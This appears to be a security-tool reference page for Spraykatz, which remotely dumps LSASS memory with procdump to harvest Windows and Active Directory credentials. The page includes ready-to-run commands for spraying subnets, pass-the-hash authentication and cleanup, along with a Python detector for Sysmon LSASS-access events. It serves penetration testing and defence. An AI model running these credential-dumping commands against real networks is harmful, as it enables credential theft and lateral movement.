Tags: Post Exploitation, credentials, windows, active-directory, procdump, remote-execution, credential-dumping

Spraykatz

Spraykatz retrieves credentials from Windows machines and large Active Directory environments by running procdump remotely on each target and parsing the resulting memory dumps off-host, which keeps credential-parsing tooling such as mimikatz off the target and reduces antivirus detections.

Description

Spraykatz is a tool designed to extract credentials from Windows systems, particularly in large Active Directory environments. It operates by remotely deploying procdump to target machines, capturing memory dumps of the LSASS process, retrieving those dumps, and parsing them for credential material. The only binary that runs on the target is procdump, a Microsoft-signed Sysinternals tool; the parsing happens on the operator's machine, so signature-based antivirus on the target has far less to match against. Behavioural sensors that watch for handles opened on lsass.exe are not evaded by this design.

The tool requires the specified user to have administrative privileges on target systems to achieve remote code execution. It supports both individual IP addresses and ranges, making it suitable for spraying across multiple hosts in a network. Use cases include post-exploitation scenarios where initial access has been gained, and domain credentials are needed for lateral movement or privilege escalation.

Caution is advised as the tool explicitly warns against use in production environments. A cleanup mode is available to remove procdump binaries and leftover dumps from compromised systems.

How It Works

Spraykatz authenticates to each Windows target with administrative credentials (a password or an NTLM hash in LM:NT form) and uses that access to execute procdump remotely against the LSASS process, whose memory holds cached logon secrets. The dump is copied back to the operator's machine and parsed there with pypykatz. Because no credential parser ever runs on the target, most antivirus signatures stay quiet; the procdump binary and dump file it leaves behind can be removed afterwards with the cleanup mode.
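The evasion described above rests on parsing the dump off-host, so it is worth seeing what a host sensor still records: procdump must open a handle to lsass.exe with memory-read access, and Sysmon Event ID 10 (ProcessAccess) logs that handle open together with the access mask and the call trace, which passes through the MiniDump library (dbghelp.dll or dbgcore.dll) even when the dumper is renamed. The following Python is an added example written for this page, not code from Spraykatz, Sysmon or the Kali package; the event records are constructed for the demo and the allow-list of benign source images is illustrative and must be tuned per environment.

```python
"""Flag Sysmon ProcessAccess (Event ID 10) records that look like an LSASS memory dump.

Added example for this page, not part of Spraykatz. The records below are a
simplified JSON rendering of Sysmon's XML fields (SourceImage, TargetImage,
GrantedAccess, CallTrace); the values are constructed for the demo.
"""
import json
from typing import Iterable, Optional

# Access-mask bits of interest. PROCESS_VM_READ (0x0010) is required by any
# tool that reads another process's memory; 0x1FFFFF is PROCESS_ALL_ACCESS.
PROCESS_VM_READ = 0x0010
PROCESS_ALL_ACCESS = 0x1FFFFF

# Source images that open lsass.exe legitimately on most hosts. Illustrative
# allow-list (assumption for this demo); tune it against your own baseline.
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\wbem\wmiprvse.exe",
}

# Sysinternals procdump binary names as shipped (renaming defeats this check,
# which is why the call-trace check below matters).
DUMPER_IMAGES = {"procdump.exe", "procdump64.exe", "procdump64a.exe"}
# MiniDumpWriteDump lives in these DLLs; a dumper's call trace goes through one of them.
DUMP_DLLS = ("dbghelp.dll", "dbgcore.dll")


def classify_lsass_access(event: dict) -> Optional[str]:
    """Return a reason string if the event looks like an LSASS memory read, else None."""
    if event.get("EventID") != 10:
        return None
    target = event.get("TargetImage", "").lower()
    if not target.endswith("\\lsass.exe"):
        return None
    source = event.get("SourceImage", "").lower()
    if source in ALLOWED_SOURCES:
        return None
    granted = int(event.get("GrantedAccess", "0x0"), 16)
    call_trace = event.get("CallTrace", "").lower()
    basename = source.rsplit("\\", 1)[-1]
    if basename in DUMPER_IMAGES:
        return f"known dumper image {basename} opened lsass.exe (0x{granted:X})"
    if any(dll in call_trace for dll in DUMP_DLLS):
        return f"{basename} reached lsass.exe through a MiniDump library (0x{granted:X})"
    if granted == PROCESS_ALL_ACCESS or granted & PROCESS_VM_READ:
        return f"{basename} opened lsass.exe with memory-read access (0x{granted:X})"
    return None


def detect_lsass_dumps(events: Iterable[dict]) -> list:
    """Run the classifier over a stream of events and collect findings."""
    findings = []
    for ev in events:
        reason = classify_lsass_access(ev)
        if reason:
            findings.append({"SourceImage": ev["SourceImage"], "reason": reason})
    return findings


# Constructed sample events: a stock procdump run, a benign csrss.exe access,
# a monitoring agent with a harmless query-only mask, a renamed dumper, and
# an unrelated process-creation event.
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\Temp\procdump64.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d5f4|C:\Windows\System32\KERNELBASE.dll+2e0ab|C:\Windows\Temp\procdump64.exe+1a3c2"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d5f4|C:\Windows\System32\csrss.exe+3b10"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Monitoring\agent.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d5f4|C:\Program Files\Monitoring\agent.exe+77e1"},
    {"EventID": 10, "SourceImage": r"C:\Windows\Temp\svc.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d5f4|C:\Windows\System32\dbgcore.dll+1b4ea|C:\Windows\Temp\svc.exe+4c01"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
]

if __name__ == "__main__":
    print(json.dumps(detect_lsass_dumps(SAMPLE_EVENTS), indent=2))
```

Sysmon does not log ProcessAccess unless its configuration explicitly includes lsass.exe as a target image, so the first check on the defensive side is whether Event ID 10 is being collected at all; 0x1000 (PROCESS_QUERY_LIMITED_INFORMATION) alone is deliberately not flagged because many legitimate tools use it, whereas any mask carrying PROCESS_VM_READ, or a call trace through dbghelp.dll or dbgcore.dll, is the signature a remote procdump run leaves behind regardless of where the dump is parsed.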

Installation

```bash
sudo apt install spraykatz
```

Flags

-u, --username USERNAME    User to spray with. He must have admin rights on targeted systems in order to gain remote code execution.
-p, --password PASSWORD    User's password or NTLM hash in the LM:NT format.
-t, --targets TARGETS      IP addresses and/or IP address ranges.
-d, --domain DOMAIN        User's domain. If he is not member of a domain, simply use "-d ." instead.
-r, --remove               Only try to remove ProcDump and dumps left behind on distant machines. Just in case.
-v, --verbosity {warning,info,debug}
                           Verbosity mode. Default is info.
-w, --wait WAIT            How many seconds Spraykatz waits before exiting gracefully. Default is 180 seconds.
-h, --help                 show this help message and exit

Examples

Display the help menu and usage information for spraykatz.
spraykatz -h
Extract credentials from a single Windows target using a local administrator account; "-d ." marks the account as not belonging to a domain.
spraykatz -u administrator -p Password123 -t 192.168.1.100 -d .
Spray across an entire subnet in a domain environment to dump credentials from every host the account can administer.
spraykatz -u administrator -p Password123 -t 192.168.1.0/24 -d COMPANY
Authenticate with an NTLM hash in LM:NT format against a standalone machine. The hash shown is the well-known hash of an empty password and is used here only to illustrate the format.
spraykatz -u user -p aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -t 10.0.0.50 -d .
Target an IP range of workgroup machines with a local account and debug verbosity for detailed output. The password is single-quoted because "!" triggers history expansion in an interactive bash shell.
spraykatz -u admin -p 'Summer2024!' -t 172.16.0.1-172.16.0.50 -d . -v debug
Remove procdump binaries and leftover dumps from a target machine (cleanup mode); the same credentials used for the spray are needed to reach the host.
spraykatz -r -u admin -p Password123 -t 192.168.1.100 -d .
Authenticate as a domain service account with its NTLM hash (the domain goes in -d, not in the username; the LM half is the empty-LM constant and the NT half is the account's hash) and raise the exit wait to 300 seconds so slow targets have time to return their dumps.
spraykatz -u svc_account -d CORP -p aad3b435b51404eeaad3b435b51404ee:<NT hash> -t 10.10.10.10-10.10.10.20 -w 300 -v info
Updated 2026-04-16. Source: kali.org